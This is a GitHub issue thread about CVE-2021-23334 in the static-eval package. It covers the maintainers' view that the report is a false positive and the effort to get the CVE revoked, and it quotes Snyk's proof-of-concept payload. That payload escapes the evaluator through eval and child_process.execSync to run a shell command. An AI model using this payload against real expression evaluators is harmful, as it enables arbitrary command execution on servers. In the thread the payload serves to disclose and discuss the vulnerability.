browserify/static-eval

High Severity Security vulnerability with package

charlieTheBotDev opened this issue · 20 comments

@goto-bus-stop can it be fixed? Thanks!

It's a false positive.

Could you elaborate on that a bit? Snyk have a PoC at https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765 ...

// Snyk's PoC as posted: static-eval is handed an AST built from attacker-controlled source.
const evaluate = require('static-eval');
const parse = require('esprima').parse;

// The payload is an IIFE whose template literal embeds an eval() call; the eval'd string
// reaches child_process through process.mainModule.constructor._load and runs `ls`.
const src = "(function (x) { return `${eval(\"console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())\")}` })()";

// Take the ExpressionStatement's expression node and feed it to static-eval.
const ast = parse(src).body[0].expression;
evaluate(ast); // if static-eval executes the payload, the command output is printed

... and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334 has been raised for it

I see, I thought it was the same as this: 418sec/huntr#1883. That PR had omitted the quotes.

It looks like the snyk one is more valid, but still, essentially expected behaviour as documented in our readme. https://github.com/browserify/static-eval#security

This issue is also in NVD-CVE-2021-23334.
It’s giving a hard time to other libraries; in my case, pdfmake. It’s a high-severity vulnerability issue reported by npm and it’s being blocked by systems that handle this type of package.

Any workaround that we can use or possibly for a solution?

i emailed snyk and they said they would revoke the CVE. i'm not sure how that works, so it might take a few days.

Any more info about the CVE revoke?

It's already revoked. WhiteSource at least doesn't show it as a CVE anymore.

@SymbioticKilla But I guess a REJECT was not officially requested from the assigning CNA? According to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334 the assigning CNA was "Snyk", so if the issue turns out to be a non-security issue and the CVE invalid, the respective CNA would need to reject the entry.

namtx commented

Do we have any update?

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071860

Snyk has updated their own system to reflect that this was deemed not an issue. However, it has yet to reach the CVE database to get revoked/amended. I just tweeted at Snyk to see how long that process normally takes. I doubt I'll hear anything, but it seems to be the best way to get in touch about something like this.

Hey @Garbee, thanks for raising this issue. Yep, I agree: anything going into evaluate should not be trusted, and it is not the responsibility of the maintainer to sanitise user input. This was added by Snyk by mistake; apologies for the spam. I will revoke the CVE and mark any Snyk references as false positive. (Expect this change in the next 24 hours.)

Doesn't look like the CVE database maintainers poll updates to existing issues that are revoked unfortunately :(

I sent a report last month for the CVE database and didn't hear back. maybe someone else will be luckier.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334
You will need to post a request here asking for a CVE update and then asking for the CVE to be revoked.
https://cveform.mitre.org/

Hey, after contacting MITRE through multiple channels, CVE-2021-23334 has been marked as rejected/revoked. Hope this helps. This issue can be closed

npm audit from today =(

Critical Withdrawn: Arbitrary Code Execution in static-eval

Package static-eval

Patched in No patch available

Dependency of @amcharts/amcharts4

Path @amcharts/amcharts4 > pdfmake > svg-to-pdfkit > pdfkit > linebreak > brfs > static-module > static-eval

Same problem here =(

For those commenting about failing npm/yarn audits suddenly today, I suspect this has to do with the background change to the npm advisories database which now points to the github advisories db: https://github.blog/2021-10-07-github-advisory-database-now-powers-npm-audit/

Not sure what to do with this info yet but an fyi @leonardomaier @SymbioticKilla

Same issue here also. Any update?

this package is very stable and the only maintenance effort is in dealing with bogus security warnings. idk why npm doesn't just allow you to silence warnings that are clearly bullshit instead of forcing us to do useless work. i guess i'll email them about this one…

for folks who use auditjs: use whitelisting

  1. just add a file auditjs.json to your folder, where you run auditjs command with the following content:
    { "ignore": [ { "id": "CVE-2021-23334", "reason": "any reason you want" } ] }

  2. run audit command: npx auditjs ossi --whitelist /path/to/file/auditjs.json